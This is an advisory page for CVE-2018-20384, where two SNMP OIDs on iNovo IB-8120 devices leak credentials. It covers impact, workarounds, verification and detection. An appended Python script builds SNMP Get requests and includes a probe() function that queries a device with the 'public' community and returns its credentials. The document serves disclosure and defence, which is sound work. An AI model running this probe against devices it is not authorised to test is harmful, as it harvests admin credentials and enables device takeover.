CVE-2018-20384

9.8 CRITICAL

📋 TL;DR

Two vendor-specific SNMP OIDs on affected iNovo Broadband devices return the device's credentials in the clear. Anyone who can reach the SNMP service (UDP/161) and present a community string the device accepts can read them; no web or console authentication is involved, so the harvested credentials can then be used for full device compromise. Organizations running iNovo Broadband IB-8120-W21 and IB-8120-W21E1 devices on the vulnerable firmware builds listed below are affected.

💻 Affected Systems

Products:
  • iNovo Broadband IB-8120-W21
  • iNovo Broadband IB-8120-W21E1
Versions: IB-8120-W21: 139.4410mp1.004200.002, IB-8120-W21E1: 139.4410mp1.3921132mp1.899.004404.004
Operating Systems: Embedded firmware
Default Config Vulnerable: ⚠️ Yes
Notes: Any device with SNMP enabled and reachable is vulnerable; the two OIDs listed under "How to Verify" return credential data to any query the SNMP service accepts. They sit under the CableLabs enterprise arc (1.3.6.1.4.1.4491), i.e. in vendor/DOCSIS-specific MIB space rather than in a standard MIB-II object, so generic SNMP hardening guides will not mention them by name.


⚠️ Risk & Real-World Impact

🔴 Worst Case

Complete device takeover leading to network compromise, credential harvesting, and potential lateral movement within the network.

🟠 Likely Case

Attackers gain administrative access to affected devices, enabling configuration changes, traffic interception, and credential theft.

🟢 If Mitigated

Limited impact with proper network segmentation and SNMP access controls preventing unauthorized queries.

🌐 Internet-Facing: HIGH - Devices exposed to the internet can be directly exploited by any remote attacker.
🏢 Internal Only: MEDIUM - Internal attackers or compromised systems could exploit this vulnerability within the network.

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: CONFIRMED
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

Exploitation needs only network reachability of the SNMP service (UDP/161), a community string the device accepts, and the two OIDs: a single Get request returns the credentials. A public proof of concept exists in the GitHub repository cited by the advisory's references.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Unknown

Vendor Advisory: No vendor advisory found

Restart Required: No

Instructions:

No official patch available. Check with iNovo Broadband for firmware updates. Consider replacing devices if no fix is provided.

🔧 Temporary Workarounds

Disable SNMP Access (applies to: all)

Completely disable the SNMP service on affected devices if it is not required for operations.

Restrict SNMP Access (applies to: all)

Configure SNMP access controls (and upstream firewall rules) to limit UDP/161 queries to trusted management addresses only. Also replace any default community string; with SNMPv1/v2c the community string is the only thing standing between an attacker and the credential OIDs.

Change Default Credentials (applies to: all)

Change all default credentials on affected devices. This does not close the disclosure itself, because the OIDs return whatever credentials are currently set; do it after SNMP has been disabled or restricted, and treat any credentials that were in place while SNMP was exposed as compromised.

🧯 If You Can't Patch

  • Isolate affected devices in separate network segments with strict firewall rules
  • Implement network monitoring for SNMP queries to the vulnerable OIDs
  • Consider replacing devices with supported alternatives if vendor provides no fix

🔍 How to Verify

Check if Vulnerable:

Query the two scalar OIDs 1.3.6.1.4.1.4491.2.4.1.1.6.1.1.0 and 1.3.6.1.4.1.4491.2.4.1.1.6.1.2.0 (snmpwalk prints them with an "iso." prefix) with snmpget, or snmpwalk, using the SNMP version and read community string the device accepts. If either returns a non-empty OCTET STRING containing credential data, the device is vulnerable. A device that does not expose them answers with noSuchObject/noSuchInstance (SNMPv2c) or an error, or, if SNMP is filtered, does not answer at all.

Check Version:

Check device web interface or console for firmware version information.

Verify Fix Applied:

After applying workarounds, confirm from an untrusted address that queries to UDP/161 time out or are rejected, and from a trusted management address that the SNMP service is either disabled or answers only with the expected community string. Re-run the OID query above from both positions and confirm no credential data is returned to the untrusted side.

📡 Detection & Monitoring

Log Indicators:

  • SNMP Get/GetNext requests naming 1.3.6.1.4.1.4491.2.4.1.1.6.1.1.0 or 1.3.6.1.4.1.4491.2.4.1.1.6.1.2.0 (snmpwalk displays them as iso.3.6.1.4.1.4491.…), and SNMP responses that carry those OIDs with a non-empty string value
  • Successful administrative logins (web interface or console) from unexpected sources shortly after such queries; the leaked credentials are valid, so expect successes rather than failed attempts

Network Indicators:

  • SNMP traffic (UDP 161) to affected devices from untrusted sources
  • Unusual SNMP query patterns

SIEM Query:

dest_port=161 AND (oid="1.3.6.1.4.1.4491.2.4.1.1.6.1.1.0" OR oid="1.3.6.1.4.1.4491.2.4.1.1.6.1.2.0")

Field names are pseudo-code. Match on the destination port: queries go to UDP/161, so a source_port=161 condition would select the device's responses rather than the probes. The oid field requires a sensor that decodes SNMP varbinds (flow records carry no OIDs), and it should use the numeric wire form, since the "iso." prefix is snmpwalk display notation. A second rule on responses (source_port=161) carrying these OIDs catches a walk that started at a parent arc and never named them in a request.
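The verification query and the OID-based detection above need the same thing: SNMP Get requests built and decoded at the BER level. The following is an added example, not code from the advisory or the vendor; it hand-rolls SNMPv2c encoding with only the Python standard library. The community string "public", the host argument of probe() and the bytes produced by constructed_vulnerable_response() are assumptions and constructed test data, and the credential values in it are placeholders.

```python
"""CVE-2018-20384 helper: build/decode SNMPv2c messages for the two credential OIDs
and flag probes for them in UDP/161 payloads. Added example, stdlib only."""
import socket

# The advisory's two OIDs (CableLabs enterprise arc 4491) in numeric wire form;
# snmpwalk prints the same OIDs with an "iso." prefix.
VULN_OIDS = ("1.3.6.1.4.1.4491.2.4.1.1.6.1.1.0", "1.3.6.1.4.1.4491.2.4.1.1.6.1.2.0")
GET, GETNEXT, RESPONSE, GETBULK = 0xA0, 0xA1, 0xA2, 0xA5  # SNMP PDU tags

# Minimal BER encoder: only what an SNMPv1/v2c message needs.
def _tlv(tag, body):  # BER accepts the 2-byte long-form length for any size < 65536
    n = len(body)
    return bytes([tag]) + (bytes([n]) if n < 0x80 else bytes([0x82, n >> 8, n & 0xFF])) + body

def _int(v):  # INTEGER, two's-complement, minimal length
    return _tlv(0x02, v.to_bytes((v.bit_length() + 8) // 8, "big", signed=True))

def _str(s):  # OCTET STRING
    return _tlv(0x04, s.encode() if isinstance(s, str) else s)

def _oid(dotted):  # OBJECT IDENTIFIER: 40*a+b, then base-128 arcs, high bit = more
    arcs = [int(a) for a in dotted.split(".")]
    body = bytearray([40 * arcs[0] + arcs[1]])
    for arc in arcs[2:]:
        chunk = [arc & 0x7F]
        arc >>= 7
        while arc:
            chunk.insert(0, 0x80 | (arc & 0x7F))
            arc >>= 7
        body.extend(chunk)
    return _tlv(0x06, bytes(body))

def build_message(community, pdu_type, varbinds, request_id=0x1337):
    """SNMPv2c message (version field 1); varbinds are (oid, BER-encoded value) pairs."""
    vbl = b"".join(_tlv(0x30, _oid(o) + v) for o, v in varbinds)
    pdu = _tlv(pdu_type, _int(request_id) + _int(0) + _int(0) + _tlv(0x30, vbl))
    return _tlv(0x30, _int(1) + _str(community) + pdu)

def build_get_request(community, oids, pdu_type=GET):
    """Get (or GetNext) for oids, with the NULL placeholder value in each varbind."""
    return build_message(community, pdu_type, [(o, b"\x05\x00") for o in oids])

# Minimal BER decoder.
def _read_tlv(buf, pos):
    tag, ln, pos = buf[pos], buf[pos + 1], pos + 2
    if ln & 0x80:  # long-form length
        n = ln & 0x7F
        ln, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    if pos + ln > len(buf):
        raise ValueError("truncated element")
    return tag, buf[pos:pos + ln], pos + ln

def _decode_oid(body):
    arcs, val = [body[0] // 40, body[0] % 40], 0
    for b in body[1:]:
        val = (val << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(val)
            val = 0
    return ".".join(map(str, arcs))

def parse_snmp(packet):
    """Decode an SNMPv1/v2c message into a dict; raises on malformed input."""
    tag, msg, _ = _read_tlv(packet, 0)
    if tag != 0x30:
        raise ValueError("not an SNMP message")
    _, ver, p = _read_tlv(msg, 0)
    _, community, p = _read_tlv(msg, p)
    pdu_tag, pdu, _ = _read_tlv(msg, p)
    q = 0
    for _ in range(3):  # skip request-id, error-status, error-index
        _, _, q = _read_tlv(pdu, q)
    _, vbl, _ = _read_tlv(pdu, q)
    varbinds, q = [], 0
    while q < len(vbl):
        _, vb, q = _read_tlv(vbl, q)
        _, oid_body, r = _read_tlv(vb, 0)
        vtag, vval, _ = _read_tlv(vb, r)
        varbinds.append((_decode_oid(oid_body), vtag, vval))
    return {"version": int.from_bytes(ver, "big"), "pdu_type": pdu_tag,
            "community": community.decode(errors="replace"), "varbinds": varbinds}

def leaked_credentials(response):
    """{oid: value} for vulnerable OIDs a GetResponse returned as a non-empty OCTET STRING.
    noSuchObject (0x80), noSuchInstance (0x81) or an error reply yields an empty dict."""
    msg = parse_snmp(response)
    return {oid: val.decode(errors="replace") for oid, tag, val in msg["varbinds"]
            if msg["pdu_type"] == RESPONSE and oid in VULN_OIDS and tag == 0x04 and val}

def probe(host, community="public", timeout=3.0):
    """Send the Get to host:161 and return leaked_credentials() of the reply.
    Only probe devices you are authorised to test; "public" is an assumed default."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(build_get_request(community, VULN_OIDS), (host, 161))
        return leaked_credentials(s.recvfrom(4096)[0])

def is_probe_for_vulnerable_oids(payload):
    """Detection: a Get naming either OID, or a GetNext/GetBulk (i.e. a walk) that
    starts at either OID or at any ancestor arc. Malformed input is False."""
    try:
        msg = parse_snmp(payload)
    except (ValueError, IndexError):
        return False
    walk = msg["pdu_type"] in (GETNEXT, GETBULK)
    return (walk or msg["pdu_type"] == GET) and any(
        v == oid or (walk and v.startswith(oid + "."))
        for oid, _, _ in msg["varbinds"] for v in VULN_OIDS)

def constructed_vulnerable_response():
    """Constructed test data: the shape of a vulnerable device's GetResponse;
    the string values are placeholders, not real credentials."""
    return build_message("public", RESPONSE, [(VULN_OIDS[0], _str("admin")),
                                              (VULN_OIDS[1], _str("placeholder-pw"))])
```

probe() is the only function that touches the network; everything else works on bytes, so the same parser can be pointed at UDP/161 payloads from a packet capture for detection, and leaked_credentials() can be run over the device's real reply once a probe is authorised.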
